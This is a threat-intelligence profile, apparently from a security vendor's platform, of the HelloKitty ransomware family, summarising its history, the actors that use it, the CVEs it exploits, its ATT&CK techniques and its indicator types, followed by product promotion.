HELLOKITTY
HelloKitty is a human-operated double-extortion ransomware family active since at least November 2020. It is used to compromise corporate networks, steal data, encrypt systems, and threaten public data leaks if victims do not pay. One of its most publicized incidents was the February 2021 attack on CD Projekt Red, where the operators claimed to have stolen source code for Cyberpunk 2077, Witcher 3, Gwent, and other games. The malware has also been deployed by other actors, including Vice Society, which has used preexisting ransomware strains such as HelloKitty in attacks and has disproportionately targeted the education sector. Microsoft also reported that DEV-0230 developed and deployed FiveHands and HelloKitty and often gained access through BazaLoader infrastructure.
The family has targeted both Windows and Linux environments. Reporting states that by summer 2021 the group began using a Linux variant targeting VMware ESXi, and HelloKitty is also listed among ransomware families targeting ESXi and other Linux systems. The malware can delete Volume Shadow Copies on compromised Windows hosts, including via WMI, to inhibit recovery. It can use an embedded RSA-2048 public key to encrypt victim data for ransom.
HelloKitty has been linked to exploitation-based deployment as well as hands-on intrusions. Researchers previously observed exploitation of Apache ActiveMQ CVE-2023-46604 to deploy HelloKitty ransomware in multiple customer environments. In those cases, affected organizations were running outdated ActiveMQ versions, and post-exploitation activity included attempts to load remote binaries named M2.png and M4.png via MSIExec; Rapid7 attributed the activity to HelloKitty based on the ransom note and evidence. HelloKitty has also been cited in reporting on ransomware activity targeting SonicWall SMA appliances, and SonicWall-related reporting noted prior targeting by HelloKitty ransomware.
The malware family is associated in reporting with the names DeathRansom and Fivehands, and may also be associated with Abyss Locker. Separate reporting states HelloKitty ransomware used against CD Projekt Red was reportedly built from DEATHRANSOM. In 2023, the complete source code for the first version of HelloKitty was leaked on a Russian-speaking hacking forum; researchers and Michael Gillespie assessed the leak as legitimate and matching the version used when the operation launched in 2020. The leaked archive reportedly contained a Microsoft Visual Studio solution for the encryptor and decryptor and the NTRUEncrypt library. Reporting also links the later Kraken ransomware group to remnants of the HelloKitty operation. Older FBI indicators of compromise may be outdated because the encryptor changed over time.
Hunt this family in your stack
Mallory pivots from this family to the IOCs, detections, and named campaigns that touch your stack, and pages you when something new lands.
Vulnerabilities exploited
3 CVEs Mallory has correlated with this family across public research and vendor advisories. Each row links to the full Mallory page for that vulnerability.
Red Canary detected an adversary executing discovery commands on dozens of cloud-based Linux endpoints vulnerable to a critical remote code vulnerability (CVE-2023-46604) in Apache ActiveMQ... Security researchers have previously identified adversaries exploiting CVE-2023-46604 for malware deployment, to spread TellYouThePass, Ransomhub and HelloKitty ransomware, along with Kinsing... Finally, the adversary used curl to download two ActiveMQ JAR files... These two JAR files constitute a legitimate patch for CVE-2023-46604. | Security researchers have previously identified adversaries exploiting CVE-2023-46604 for malware deployment, to spread TellYouThePass, Ransomhub and HelloKitty ransomware...
The TTPs are nothing new. They include initial network access through compromised credentials, exploitation of known vulnerabilities (e.g., PrintNightmare)
Mandiant said in April that the CVE-2021-20016 SMA 100 zero-day was exploited to deploy a new ransomware strain known as FiveHands... Before patches were released in late February 2021, the same bug was abused indiscriminately in the wild.
Groups observed using it
4 distinct threat actors attributed by public researchers. Open in Mallory to see the full evidence chain and overlapping campaigns.
Rather than using or developing their own locker payload, Vice Society operators have deployed third-party ransomware in their intrusions, including HelloKitty, Five Hands, and Zeppelin.
This activity group also developed and deployed the FiveHands and HelloKitty ransomware payloads and often gained access to an organization via DEV-0193’s BazaLoader infrastructure.
A threat actor has leaked the complete source code for the first version of the HelloKitty ransomware on a Russian-speaking hacking forum, claiming to be developing a new, more powerful encryptor.
HELLOKITTY ransomware—used to target Polish video game developer CD Projekt Red—is reportedly built from DEATHRANSOM.
Techniques & procedures
17 distinct techniques documented for this family, organized by ATT&CK tactic.
Initial Access
1 technique
Initial Access
“The recently disclosed Apache ActiveMQ remote code execution (RCE) flaw, CVE-2023-46604 is being exploited to spread ransomware binaries… exploiting the serialized class types in the OpenWire protocol that enables attackers to execute arbitrary shell commands.”
Execution
3 techniques
Execution
The content repeatedly describes threat actors and malware using WMI/WMIC/wmiexec for remote execution, lateral movement, discovery, persistence, and administrative actions; e.g., 'APT41 used WMI in several ways, including for execution of commands via WMIEXEC as well as for persistence via PowerSploit' and 'Scattered Spider used Windows Management Instrumentation (WMI) to move laterally via Impacket.'
Stealth
2 techniques
Stealth
Discovery
5 techniques
Discovery
The content repeatedly describes malware and threat actors obtaining lists of running processes, using utilities such as tasklist, ps, WMI, Get-Process, CreateToolhelp32Snapshot, EnumProcesses, and similar APIs/commands to enumerate active processes on victim systems.
"4H RAT sends an OS version identifier in its beacons"; "admin@338 actors used ... ver ... systeminfo"; "Bundlore will enumerate the macOS version ... using /usr/bin/sw_vers -productVersion"; "DarkTortilla ... querying ... WMI objects"; "Turla ... discover operating system configuration details using the systeminfo and set commands"
Lateral Movement
1 technique
Lateral Movement
Exfiltration
1 technique
Exfiltration
Impact
4 techniques
Impact
In a recent intrusion, we identified a ransomware deployment that appended the file extension .ViceSociety to all encrypted files...
“EncDLL acts similarly to ransomware, searching and ending a particular set of processes before starting the encryption process…”
IOCs tracked for this family
4 indicators attributed across vendor reports, sandbox runs, and researcher write-ups. Full values are available in Mallory.
File hashes (MD5, SHA-1, SHA-256) from samples and reports.
Recent activity
28 sources tracked across advisories, community write-ups, and news. New activity surfaces here as Mallory finds it.
Named ransomware group referenced as a destination for former Conti members; no additional technical details provided.
Ransomware family/cartel referenced as the predecessor/remnant source for the Kraken group.
Referenced as a prior/notorious ransomware operation/cartel whose remnants are linked to Kraken.
Ransomware operation (prominent in 2021) referenced as the predecessor/related operation to Kraken; noted to have attempted rebranding after its source code leak.
The version that knows your environment.
Match every observed IP, domain, and hash against your live telemetry.
Named campaigns wielding this family, with evidence pinned to each claim.
CVEs this family uses for access and lateral movement.
YARA, Sigma, Snort, and vendor rules, auto-deployed to your SIEM.
Every documented technique, ranked by evidence weight.
Reddit, Mastodon, and CTI community discussion around this family.